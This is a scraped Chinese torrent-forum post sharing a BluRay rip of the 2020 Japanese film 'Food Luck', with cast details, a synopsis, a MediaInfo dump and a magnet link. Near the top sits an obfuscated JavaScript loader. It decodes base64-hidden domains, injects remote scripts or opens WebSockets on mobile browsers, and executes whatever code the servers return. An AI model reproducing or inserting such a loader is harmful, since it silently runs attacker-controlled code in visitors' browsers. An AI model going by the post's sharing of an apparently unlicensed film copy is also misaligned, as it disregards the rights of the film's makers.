食运[中文字幕].Food.Luck.2020.1080p.BluRay.x265.10bit.DTS 4.92GB

版主小s 16天前 231

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 食运 / 奇迹的烧肉店(港) / FOOD LUCK

◎片 名 フード?ラック!食運

◎年 代 2020

◎产 地 日本

◎类 别 剧情

◎语 言 日语

◎上映日期 2020-11-20(日本)

◎IMDb链接 https://www.imdb.com/title/tt13181596/

◎豆瓣评分 6.0/10 (886人评价)

◎豆瓣链接 https://movie.douban.com/subject/35139949/

◎片 长 105分钟

◎演 员 片冈直人 Kataoka Naoto (id:1358657)

土屋太凤 Tao Tsuchiya (id:1315335)

凉 Ry? (id:1140849)

石黑贤 Ken Ishiguro (id:1008604)

松尾谕 Satoru Matsuo (id:1336214)

寺胁康文 Yasufumi Terawaki (id:1033952)

矢柴俊博 Toshihiro Yashiba (id:1275800)

笕美和子 Miwako Kakei (id:1337945)

大泉洋 Y? ?izumi (id:1184188)

大和田伸也 Shin'ya ?wada (id:1131413)

龙雷太 Raita Ry? (id:1145110)

◎标 签 日本 / 美食 / 日本电影 / 2020 / 烤肉 / 美食烤肉 / 剧情 / 土屋太凤

◎简 介

佐藤良人(NAOTO饰)的母亲安江(凉饰)一个人经营着烤肉店“根岸苑”,这是亡夫留下的唯一的遗物。一个女人独自开店,一边养育儿子,一边亲手做出充满爱意的料理,这对安江来说是幸福的时光,对良人来说,吃母亲亲手做的美食是最幸福的时候。

这是深受人们喜爱的“根岸苑”,但由于人气美食评论家古山(松尾谕饰)所写的毫无根据的报道,来店光顾的客人骤减。在店铺一点点恢复活力的时候,良人想让一直一心忙碌工作的安江能够照顾他,于是不久后安江就决定关店了。

18年后,良人离开了家,成为一个没有出头之日的自由撰稿人。有一天,他与编辑竹中静香(土屋太凤饰)一同被任命成立只收集“真货”的新美食情报网站。第一弹的主题是“缘分的烤肉”。虽然良人决定接受,但是也为这份工作感到苦恼,此时他收到了关系已经疏远了的母亲安江病倒的消息。良人下不了和母亲见面的决心,通过到访名店进行采访的过程,...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 132397888258684964987748110911600291213 (0x639AE7DFB29257075052D645BF936D8D)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 4.92 GiB

  8. Duration : 1 h 44 min

  9. Overall bit rate : 6 715 kb/s

  10. Movie name : Food Luck 2020

  11. Encoded date : UTC 2021-09-29 05:59:06

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 44 min

  23. Bit rate : 5 183 kb/s

  24. Width : 1 920 pixels

  25. Height : 1 036 pixels

  26. Display aspect ratio : 1.85:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.109

  33. Stream size : 3.80 GiB (77%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=17.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS ES

  42. Format/Info : Digital Theater Systems

  43. Commercial name : DTS-ES Matrix

  44. Codec ID : A_DTS

  45. Duration : 1 h 44 min

  46. Bit rate mode : Constant

  47. Bit rate : 1 509 kb/s

  48. Channel(s) : 6 channels

  49. Channel(s)_Original : 7 channels

  50. ChannelLayout_Original : C L R Ls Rs Cs LFE

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 24 bits

  54. Compression mode : Lossy

  55. Stream size : 1.11 GiB (22%)

  56. Language : Japanese

  57. Default : Yes

  58. Forced : No

  59. Original source medium : Blu-ray


  60. Text #1

  61. ID : 3

  62. ID in the original source medium : 4608 (0x1200)

  63. Format : PGS

  64. Muxing mode : zlib

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 39 min

  68. Bit rate : 33.8 kb/s

  69. Count of elements : 2220

  70. Stream size : 24.1 MiB (0%)

  71. Title : cht

  72. Language : Chinese

  73. Default : No

  74. Forced : No

  75. Original source medium : Blu-ray


  76. Text #2

  77. ID : 4

  78. ID in the original source medium : 4609 (0x1201)

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 1 h 39 min

  84. Bit rate : 32.5 kb/s

  85. Count of elements : 2224

  86. Stream size : 23.1 MiB (0%)

  87. Language : English

  88. Default : No

  89. Forced : No

  90. Original source medium : Blu-ray


  91. Menu

  92. 00:00:00.000 : Chapter 01

  93. 00:06:12.166 : Chapter 02

  94. 00:19:09.333 : Chapter 03

  95. 00:26:39.041 : Chapter 04

  96. 00:34:29.541 : Chapter 05

  97. 00:46:32.791 : Chapter 06

  98. 00:51:54.000 : Chapter 07

  99. 01:01:37.208 : Chapter 08

  100. 01:10:05.791 : Chapter 09

  101. 01:17:05.833 : Chapter 10

  102. 01:29:09.333 : Chapter 11

  103. 01:36:33.958 : Chapter 12


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:768FDE2475EFCB9D0E97CE42913F16B1A8F607BD
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖